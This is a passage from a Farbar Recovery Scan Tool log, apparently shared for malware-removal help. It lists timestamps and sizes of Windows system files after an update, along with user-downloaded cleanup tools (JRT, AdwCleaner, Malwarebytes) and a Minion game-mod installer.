Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-08-08 19:26 - 
2017-07-28 07:30 - 001068720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-08-08 19:26 - 2017-07-28 07:25 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-08-08 19:26 - 2017-07-28 07:24 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2017-08-08 19:26 - 2017-07-28 07:24 - 000455584 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll 2017-08-08 19:26 - 2017-07-28 07:24 - 000119904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll 2017-08-08 19:26 - 2017-07-28 07:24 - 000116280 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll 2017-08-08 19:26 - 2017-07-28 07:23 - 002969888 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-08-08 19:26 - 2017-07-28 07:23 - 000723360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys 2017-08-08 19:26 - 2017-07-28 07:22 - 000923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-08-08 19:26 - 2017-07-28 07:20 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys 2017-08-08 19:26 - 2017-07-28 07:17 - 000660680 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll 2017-08-08 19:26 - 2017-07-28 07:16 - 007326128 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2017-08-08 19:26 - 2017-07-28 07:16 - 000961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll 2017-08-08 19:26 - 2017-07-28 07:15 - 005302968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll 2017-08-08 19:26 - 2017-07-28 07:15 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-08-08 19:26 - 2017-07-28 07:15 - 000715168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys 2017-08-08 19:26 - 2017-07-28 07:15 - 000554400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS 2017-08-08 19:26 - 2017-07-28 07:14 - 000654976 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\AppXDeploymentClient.dll 2017-08-08 19:26 - 2017-07-28 07:14 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe 2017-08-08 19:26 - 2017-07-28 07:13 - 007907344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 006557520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 002604248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 001033544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 000192264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 000104432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 001337856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 000323936 _____ (Microsoft Corporation) C:\WINDOWS\system32\shlwapi.dll 2017-08-08 19:26 - 2017-07-28 07:10 - 002679200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-08-08 19:26 - 2017-07-28 07:10 - 001114528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll 2017-08-08 19:26 - 2017-07-28 07:09 - 000529992 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll 2017-08-08 19:26 - 2017-07-28 07:09 - 000527976 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe 2017-08-08 19:26 - 2017-07-28 07:09 - 000387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2017-08-08 19:26 - 
2017-07-28 07:07 - 000805816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-08-08 19:26 - 2017-07-28 06:48 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-08-08 19:26 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcd.dll 2017-08-08 19:26 - 2017-07-28 06:48 - 000096648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll 2017-08-08 19:26 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-08-08 19:26 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2017-08-08 19:26 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll 2017-08-08 19:26 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll 2017-08-08 19:26 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 001195760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000864248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000173104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000090464 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.dll 2017-08-08 19:26 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-08-08 19:26 - 2017-07-28 06:35 - 000277432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shlwapi.dll 2017-08-08 19:26 - 2017-07-28 06:33 - 000967584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll 2017-08-08 19:26 - 2017-07-28 06:33 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-08-08 19:26 - 2017-07-28 06:33 - 000414296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll 2017-08-08 19:26 - 2017-07-28 06:31 - 003995136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll 2017-08-08 19:26 - 2017-07-28 06:30 - 001722880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dui70.dll 2017-08-08 19:26 - 2017-07-28 06:29 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2017-08-08 19:26 - 2017-07-28 06:29 - 000142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll 2017-08-08 19:26 - 2017-07-28 06:27 - 000051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys 2017-08-08 19:26 - 2017-07-28 06:26 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll 2017-08-08 19:26 - 2017-07-28 06:26 - 000094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2017-08-08 19:26 - 2017-07-28 06:26 - 000090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ofdeploy.exe 2017-08-08 19:26 - 2017-07-28 06:26 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll 2017-08-08 19:26 - 2017-07-28 06:26 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll 2017-08-08 19:26 - 2017-07-28 06:25 - 003464704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbon.dll 2017-08-08 19:26 - 2017-07-28 06:25 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll 2017-08-08 19:26 - 
2017-07-28 06:25 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys 2017-08-08 19:26 - 2017-07-28 06:25 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000184832 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll 2017-08-08 19:26 - 2017-07-28 06:23 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-08-08 19:26 - 2017-07-28 06:23 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll 2017-08-08 19:26 - 2017-07-28 06:23 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2017-08-08 19:26 - 2017-07-28 06:22 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2017-08-08 19:26 - 2017-07-28 06:22 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 
000197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe 2017-08-08 19:26 - 2017-07-28 06:21 - 008333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000699904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\qasf.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 000524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IpNatHlpClient.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 
000566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-08-08 19:26 - 2017-07-28 06:19 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe 2017-08-08 19:26 - 2017-07-28 06:19 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 001298432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-08-08 19:26 - 2017-07-28 06:18 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000777216 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 002805248 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 
2017-08-08 19:26 - 2017-07-28 06:17 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 000420864 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 001291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 001046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 000470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-08-08 19:26 - 2017-07-28 06:16 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qasf.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 003204608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 000612864 _____ (Microsoft Corporation) C:\WINDOWS\system32\shsvcs.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 000368128 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-08-08 19:26 - 2017-07-28 06:14 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 004535296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000972288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe 2017-08-08 19:26 - 2017-07-28 06:13 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000665600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 002939392 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000587776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000337920 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-08-08 19:26 - 2017-07-28 06:11 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2017-08-08 19:26 - 2017-07-28 06:11 - 001357312 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-08-08 19:26 - 2017-07-28 06:11 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 001706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 000564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shsvcs.dll 2017-08-08 19:26 - 2017-07-28 06:09 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2017-08-08 19:26 - 2017-07-28 06:09 - 000971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe 2017-08-08 19:26 - 2017-07-28 06:09 - 000579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\untfs.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 004056064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 000600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 000097792 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Drivers\bthhfenum.sys 2017-08-08 19:26 - 2017-07-28 06:07 - 002211840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2017-08-08 19:26 - 2017-07-28 06:07 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe 2017-08-08 19:26 - 2017-07-28 06:07 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll 2017-08-08 19:26 - 2017-07-28 06:07 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll 2017-08-08 19:26 - 2017-07-28 06:07 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll 2017-08-08 19:26 - 2017-07-28 06:06 - 001833984 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll 2017-08-08 19:26 - 2017-07-28 06:06 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll 2017-08-08 19:26 - 2017-07-28 06:06 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\spbcd.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 001536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 001525760 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 000954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoconv.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 000926208 _____ (Microsoft Corporation) C:\WINDOWS\system32\autofmt.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 000892928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 000538112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\untfs.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 000078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll 2017-08-08 19:26 - 2017-07-28 06:02 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autoconv.exe 
2017-08-08 19:26 - 2017-07-28 06:02 - 000853504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autofmt.exe 2017-08-08 19:26 - 2017-07-28 06:02 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spbcd.dll 2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ C:\Users\***\AppData\Local\resmon.resmoncfg 2017-08-07 23:58 - 2017-08-09 18:57 - 000000555 _____ C:\Users\***\Desktop\JRT.txt 2017-08-07 23:57 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Desktop\JRT.exe 2017-08-07 23:56 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Downloads\JRT.exe 2017-08-07 23:35 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Desktop\adwcleaner_7.0.1.0.exe 2017-08-07 23:34 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Downloads\adwcleaner_7.0.1.0.exe 2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\***\Downloads\pcmechanicpm.exe 2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2017-08-04 22:53 - 2017-08-09 18:59 - 000000000 ____D C:\Users\***\.junique 2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\***\.minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\AppData\Roaming\gg.minion.Minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\.oracle_jre_usage 2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\***\Desktop\Minion3.0.5.exe 2017-08-04 22:52 - 2017-08-04 22:52 - 000000664 _____ C:\Users\***\Documents\Minion.lnk 2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC 2017-08-01 15:04 - 2017-08-06 
01:24 - 000092298 _____ C:\Users\***\Desktop\Addition.txt 2017-08-01 15:01 - 2017-08-09 18:59 - 000021213 _____ C:\Users\***\Desktop\FRST.txt 2017-08-01 12:17 - 2017-08-07 23:52 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2017-08-01 12:17 - 2017-08-07 19:45 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\***\AppData\Local\Nybgy 2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes 2017-08-01 12:15 - 2017-08-07 19:45 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2017-08-01 12:14 - 2017-08-07 19:55 - 000000000 ____D C:\Users\***\Desktop\mbar 2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\***\Desktop\mbar-1.09.3.1001.exe 2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 